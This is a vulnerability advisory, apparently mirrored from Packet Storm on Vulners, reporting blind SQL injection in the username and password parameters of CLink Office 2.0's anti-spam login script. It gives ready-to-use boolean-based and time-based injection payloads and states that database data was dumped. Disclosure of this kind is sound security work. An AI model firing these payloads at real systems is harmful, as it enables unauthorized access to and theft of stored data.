Vulners
Lucene search
CLink Office 2.0 SQL Injection
🗓️ 24 May 2022 00:00:00Reported by Stephen Tsoi, Erwin ChanType 
packetstorm🔗 packetstormsecurity.com👁 299 Views
`# Exploit Title: Multiple blind SQL injection vulnerabilities in in CLink Office 2.0 Anti-Spam management console
# Date: 30 Mar 2022
# Exploit Author: Erwin Chan, Stephen Tsoi
# Vendor Homepage: https://www.communilink.net/
# Softwar: CLink Office
# Version: 2.0
# Tested on: CLink Office 2.0 Anti-Spam management console
Vulnerability details below:
Affected URL: /cgi-bin/anti-spam.pl
Affected Parameter: username, password
Payload example:
- boolean-based blind SQLi
* ' AND 1234=(SELECT (CASE WHEN (TRUE) THEN 1234 ELSE (SELECT 1111 UNION
SELECT 2222) END))-- LMgx*
*' AND 1234=(SELECT (CASE WHEN (FALSE) THEN 1234 ELSE (SELECT 1111 UNION
SELECT 2222) END))-- LMgx*
- time-based blind SQLi
*' OR SLEEP(5)-- LMgx*
As a result, we were able to dump database data on application. I recommend
development team to perform input sanitization on affected parameters.
Please lets me know if you have any questions. Thanks.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 May 2022 00:00Current
7.4High risk
Vulners AI Score7.4